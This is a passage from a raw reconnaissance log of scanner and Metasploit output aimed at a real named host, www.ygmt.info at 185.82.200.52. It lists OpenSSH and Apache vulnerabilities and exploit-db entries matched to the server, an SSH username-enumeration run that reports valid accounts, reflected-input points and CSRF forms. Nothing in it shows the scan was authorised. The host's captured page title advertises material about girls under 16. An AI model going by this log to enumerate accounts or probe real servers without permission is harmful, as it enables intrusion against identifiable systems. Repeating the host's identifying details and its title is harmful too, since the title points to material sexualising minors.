9558| [30232] OpenSSH Privilege Separation Monitor Weakness
9559| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
9560| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
9561| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
9562| [29152] OpenSSH Identical Block Packet DoS
9563| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
9564| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
9565| [22692] OpenSSH scp Command Line Filename Processing Command Injection
9566| [20216] OpenSSH with KerberosV Remote Authentication Bypass
9567| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
9568| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
9569| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
9570| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
9571| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
9572| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
9573| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
9574| [6601] OpenSSH *realloc() Unspecified Memory Errors
9575| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
9576| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
9577| [6072] OpenSSH PAM Conversation Function Stack Modification
9578| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
9579| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
9580| [5408] OpenSSH echo simulation Information Disclosure
9581| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
9582| [4536] OpenSSH Portable AIX linker Privilege Escalation
9583| [3938] OpenSSL and OpenSSH /dev/random Check Failure
9584| [3456] OpenSSH buffer_append_space() Heap Corruption
9585| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
9586| [2140] OpenSSH w/ PAM Username Validity Timing Attack
9587| [2112] OpenSSH Reverse DNS Lookup Bypass
9588| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
9589| [1853] OpenSSH Symbolic Link 'cookies' File Removal
9590| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
9591| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
9592| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
9593| [688] OpenSSH UseLogin Environment Variable Local Command Execution
9594| [642] OpenSSH Multiple Key Type ACL Bypass
9595| [504] OpenSSH SSHv2 Public Key Authentication Bypass
9596| [341] OpenSSH UseLogin Local Privilege Escalation
9597|_
9598Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
9599Device type: general purpose|broadband router|WAP|webcam
9600Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
9601OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
9602Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
9603No exact OS matches for host (test conditions non-ideal).
9604Network Distance: 14 hops
9605Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
9606
9607TRACEROUTE (using port 22/tcp)
9608HOP RTT ADDRESS
96091 47.69 ms 10.246.204.1
96102 50.22 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
96113 33.65 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
96124 32.44 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
96135 56.28 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
96146 36.99 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
96157 113.10 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
96168 131.24 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
96179 131.26 ms be3433.rcr21.ams06.atlas.cogentco.com (154.54.58.202)
961810 131.28 ms worldstream.demarc.cogentco.com (149.11.38.226)
961911 131.34 ms 109.236.95.185
962012 131.31 ms 190.2.158.153
962113 131.34 ms 185.106.120.66
962214 113.12 ms latina.petite.guru (185.82.200.52)
9623######################################################################################################################################
9624USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
9625RHOSTS => www.ygmt.info
9626RHOST => www.ygmt.info
9627[*] 185.82.200.52:22 - SSH - Using malformed packet technique
9628[*] 185.82.200.52:22 - SSH - Starting scan
9629[+] 185.82.200.52:22 - SSH - User 'admin' found
9630[+] 185.82.200.52:22 - SSH - User 'administrator' found
9631[+] 185.82.200.52:22 - SSH - User 'anonymous' found
9632[-] 185.82.200.52:22 - SSH - User 'backup' not found
9633[+] 185.82.200.52:22 - SSH - User 'bee' found
9634[+] 185.82.200.52:22 - SSH - User 'ftp' found
9635[*] Scanned 1 of 1 hosts (100% complete)
9636[*] Auxiliary module execution completed
9637#######################################################################################################################################
9638Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:20 EDT
9639NSE: Loaded 164 scripts for scanning.
9640NSE: Script Pre-scanning.
9641Initiating NSE at 00:20
9642Completed NSE at 00:20, 0.00s elapsed
9643Initiating NSE at 00:20
9644Completed NSE at 00:20, 0.00s elapsed
9645Initiating Parallel DNS resolution of 1 host. at 00:20
9646Completed Parallel DNS resolution of 1 host. at 00:20, 0.02s elapsed
9647Initiating SYN Stealth Scan at 00:20
9648Scanning www.ygmt.info (185.82.200.52) [1 port]
9649Discovered open port 80/tcp on 185.82.200.52
9650Completed SYN Stealth Scan at 00:20, 0.13s elapsed (1 total ports)
9651Initiating Service scan at 00:20
9652Scanning 1 service on www.ygmt.info (185.82.200.52)
9653Completed Service scan at 00:20, 6.30s elapsed (1 service on 1 host)
9654Initiating OS detection (try #1) against www.ygmt.info (185.82.200.52)
9655Retrying OS detection (try #2) against www.ygmt.info (185.82.200.52)
9656Initiating Traceroute at 00:21
9657Completed Traceroute at 00:21, 0.19s elapsed
9658Initiating Parallel DNS resolution of 14 hosts. at 00:21
9659Completed Parallel DNS resolution of 14 hosts. at 00:21, 0.22s elapsed
9660NSE: Script scanning 185.82.200.52.
9661Initiating NSE at 00:21
9662Completed NSE at 00:21, 57.33s elapsed
9663Initiating NSE at 00:21
9664Completed NSE at 00:21, 0.54s elapsed
9665Nmap scan report for www.ygmt.info (185.82.200.52)
9666Host is up (0.12s latency).
9667rDNS record for 185.82.200.52: latina.petite.guru
9668
9669PORT STATE SERVICE VERSION
967080/tcp open http Apache httpd 2.4.10 ((Debian))
9671| http-brute:
9672|_ Path "/" does not require authentication
9673|_http-chrono: Request times for /; avg: 912.75ms; min: 698.36ms; max: 1271.96ms
9674| http-csrf:
9675| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
9676| Found the following possible CSRF vulnerabilities:
9677|
9678| Path: http://www.ygmt.info:80/top50/index.php
9679| Form id:
9680| Form action: index.php
9681|
9682| Path: http://www.ygmt.info:80/top50/index.php
9683| Form id:
9684| Form action: index.php
9685|
9686| Path: http://www.ygmt.info:80/top50/index.php?cat=Book+Stores
9687| Form id:
9688| Form action: index.php
9689|
9690| Path: http://www.ygmt.info:80/top50/index.php?cat=Book+Stores
9691| Form id:
9692| Form action: index.php
9693|
9694| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=87
9695| Form id:
9696| Form action: index.php
9697|
9698| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=87
9699| Form id:
9700| Form action: index.php
9701|
9702| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
9703| Form id:
9704| Form action: index.php
9705|
9706| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
9707| Form id:
9708| Form action: index.php
9709|
9710| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=7
9711| Form id:
9712| Form action: index.php
9713|
9714| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=7
9715| Form id:
9716| Form action: index.php
9717|
9718| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Security&start=1
9719| Form id:
9720| Form action: index.php
9721|
9722| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Security&start=1
9723| Form id:
9724| Form action: index.php
9725|
9726| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=39
9727| Form id:
9728| Form action: index.php
9729|
9730| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=39
9731| Form id:
9732| Form action: index.php
9733|
9734| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=80
9735| Form id:
9736| Form action: index.php
9737|
9738| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=80
9739| Form id:
9740| Form action: index.php
9741|
9742| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Top+Lists&start=1
9743| Form id:
9744| Form action: index.php
9745|
9746| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Top+Lists&start=1
9747| Form id:
9748| Form action: index.php
9749|
9750| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=75
9751| Form id:
9752| Form action: index.php
9753|
9754| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=75
9755| Form id:
9756| Form action: index.php
9757|
9758| Path: http://www.ygmt.info:80/top50/index.php?cat=Pay+Sites
9759| Form id:
9760| Form action: index.php
9761|
9762| Path: http://www.ygmt.info:80/top50/index.php?cat=Pay+Sites
9763| Form id:
9764|_ Form action: index.php
9765|_http-date: Sun, 06 Oct 2019 04:21:00 GMT; -4s from local time.
9766|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
9767|_http-dombased-xss: Couldn't find any DOM based XSS.
9768|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
9769| http-errors:
9770| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
9771| Found the following error pages:
9772|
9773| Error Code: 404
9774| http://www.ygmt.info:80/android-app:/
9775|
9776| Error Code: 404
9777| http://www.ygmt.info:80/top50/android-app:/
9778|
9779| Error Code: 404
9780| http://www.ygmt.info:80/url;
9781|
9782| Error Code: 404
9783|_ http://www.ygmt.info:80/top50/index.php?a=join
9784| http-feed:
9785| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
9786| Found the following feeds:
9787|_ RSS (version 2.0): http://www.ygmt.info:80/top50/feed.php
9788|_http-fetch: Please enter the complete path of the directory to save data in.
9789| http-headers:
9790| Date: Sun, 06 Oct 2019 04:21:05 GMT
9791| Server: Apache/2.4.10 (Debian)
9792| Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
9793| ETag: "a0d-583eebde65fc0"
9794| Accept-Ranges: bytes
9795| Content-Length: 2573
9796| Vary: Accept-Encoding
9797| Connection: close
9798| Content-Type: text/html
9799|
9800|_ (Request type: HEAD)
9801|_http-jsonp-detection: Couldn't find any JSONP endpoints.
9802|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
9803| http-methods:
9804|_ Supported Methods: GET HEAD POST OPTIONS
9805|_http-mobileversion-checker: No mobile version detected.
9806| http-php-version: Logo query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
9807|_Credits query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
9808|_http-security-headers:
9809|_http-server-header: Apache/2.4.10 (Debian)
9810| http-sitemap-generator:
9811| Directory structure:
9812| /
9813| Other: 1
9814| /banner/
9815| jpg: 3
9816| /bn/
9817| jpg: 1; png: 1
9818| /top50/
9819| php: 1
9820| /top50/css/
9821| css: 1
9822| /top50/js/
9823| js: 1
9824| /top50/skins/photo50/
9825| png: 1
9826| Longest directory structure:
9827| Depth: 3
9828| Dir: /top50/skins/photo50/
9829| Total files found (by extension):
9830|_ Other: 1; css: 1; jpg: 4; js: 1; php: 1; png: 2
9831|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9832|_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
9833| http-unsafe-output-escaping:
9834| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?cat=Book+Stores
9835| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
9836| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Security&start=1
9837| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Top+Lists&start=1
9838|_ Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?cat=Pay+Sites
9839| http-vhosts:
9840|_127 names had status 200
9841|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
9842|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
9843|_http-xssed: No previously reported XSS vuln.
9844| vulners:
9845| cpe:/a:apache:http_server:2.4.10:
9846| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
9847| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
9848| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
9849| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
9850| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
9851| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
9852| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
9853| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
9854| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
9855| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
9856| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
9857| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
9858| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
9859| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
9860| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
9861| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
9862| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
9863| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
9864| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
9865| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
9866| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
9867|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
9868| vulscan: VulDB - https://vuldb.com:
9869| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
9870| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
9871| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
9872| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
9873| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
9874| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
9875| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
9876|
9877| MITRE CVE - https://cve.mitre.org:
9878| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
9879| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
9880| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
9881| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
9882| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
9883| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
9884| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
9885| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
9886| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
9887| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
9888|
9889| SecurityFocus - https://www.securityfocus.com/bid/:
9890| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
9891| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
9892| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
9893| [15177] PHP Apache 2 Local Denial of Service Vulnerability
9894| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
9895| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
9896| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
9897| [5485] Apache 2.0 Path Disclosure Vulnerability
9898| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
9899| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
9900| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
9901| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
9902|
9903| IBM X-Force - https://exchange.xforce.ibmcloud.com:
9904| [75211] Debian GNU/Linux apache 2 cross-site scripting
9905|
9906| Exploit-DB - https://www.exploit-db.com:
9907| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
9908| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
9909| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
9910| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
9911| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
9912| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
9913| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
9914| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
9915| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
9916| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
9917| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
9918| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
9919| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
9920| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
9921| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
9922| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
9923| [21719] Apache 2.0 Path Disclosure Vulnerability
9924| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
9925| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
9926| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
9927| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
9928| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
9929| [17691] Apache Struts < 2.2.0 - Remote Command Execution
9930| [15319] Apache 2.2 (Windows) Local Denial of Service
9931| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
9932| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
9933| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
9934| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
9935| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
9936| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
9937| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
9938| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
9939| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
9940| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
9941| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
9942| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
9943| [9] Apache HTTP Server 2.x Memory Leak Exploit
9944|
9945| OpenVAS (Nessus) - http://www.openvas.org:
9946| [855524] Solaris Update for Apache 2 120544-14
9947| [855077] Solaris Update for Apache 2 120543-14
9948| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
9949| [72626] Debian Security Advisory DSA 2579-1 (apache2)
9950| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
9951| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
9952| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
9953| [71256] Debian Security Advisory DSA 2452-1 (apache2)
9954| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
9955| [70724] Debian Security Advisory DSA 2405-1 (apache2)
9956| [70235] Debian Security Advisory DSA 2298-2 (apache2)
9957| [70233] Debian Security Advisory DSA 2298-1 (apache2)
9958| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
9959| [69338] Debian Security Advisory DSA 2202-1 (apache2)
9960| [65131] SLES9: Security update for Apache 2 oes/CORE
9961| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
9962| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
9963| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
9964| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
9965| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
9966| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
9967| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
9968| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
9969| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
9970| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
9971| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
9972| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
9973| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
9974| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
9975| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
9976| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
9977| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
9978| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
9979| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
9980| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
9981| [11092] Apache 2.0.39 Win32 directory traversal
9982| [66081] SLES11: Security update for Apache 2
9983| [66074] SLES10: Security update for Apache 2
9984| [66070] SLES9: Security update for Apache 2
9985| [65893] SLES10: Security update for Apache 2
9986| [65888] SLES10: Security update for Apache 2
9987| [65510] SLES9: Security update for Apache 2
9988| [65249] SLES9: Security update for Apache 2
9989| [65230] SLES9: Security update for Apache 2
9990| [65228] SLES9: Security update for Apache 2
9991| [65207] SLES9: Security update for Apache 2
9992| [65136] SLES9: Security update for Apache 2
9993| [65017] SLES9: Security update for Apache 2
9994|
9995| SecurityTracker - https://www.securitytracker.com:
9996| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
9997| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
9998| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
9999| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
10000| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
10001|
10002| OSVDB - http://www.osvdb.org:
10003| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
10004|_
10005Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
10006Device type: general purpose|broadband router|WAP|webcam
10007Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
10008OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
10009Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
10010No exact OS matches for host (test conditions non-ideal).
10011Uptime guess: 30.012 days (since Fri Sep 6 00:04:24 2019)
10012Network Distance: 14 hops
10013TCP Sequence Prediction: Difficulty=258 (Good luck!)
10014IP ID Sequence Generation: All zeros
10015
10016TRACEROUTE (using port 80/tcp)
10017HOP RTT ADDRESS
100181 46.10 ms 10.246.204.1
100192 46.19 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
100203 71.26 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
100214 71.25 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
100225 54.98 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
100236 55.03 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
100247 132.05 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
100258 132.10 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
100269 132.13 ms be3433.rcr21.ams06.atlas.cogentco.com (154.54.58.202)
1002710 149.74 ms worldstream.demarc.cogentco.com (149.14.93.74)
1002811 149.79 ms 109.236.95.183
1002912 132.27 ms 190.2.158.153
1003013 132.25 ms 185.106.120.66
1003114 132.34 ms latina.petite.guru (185.82.200.52)
10032
10033NSE: Script Post-scanning.
10034Initiating NSE at 00:21
10035Completed NSE at 00:21, 0.00s elapsed
10036Initiating NSE at 00:21
10037Completed NSE at 00:21, 0.00s elapsed
10038#####################################################################################################################################
10039http://www.ygmt.info [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
10040######################################################################################################################################
10041
10042wig - WebApp Information Gatherer
10043
10044
10045Scanning http://www.ygmt.info...
10046________________________ SITE INFO _________________________
10047IP Title
10048185.82.200.52 Books, videos, photos, fiction and non-fic
10049
10050_________________________ VERSION __________________________
10051Name Versions Type
10052Apache 2.4.10 Platform
10053Debian 8.0 | 8.0 (pre-release) OS
10054
10055____________________________________________________________
10056Time: 30.6 sec Urls: 809 Fingerprints: 40401
10057######################################################################################################################################
10058HTTP/1.1 200 OK
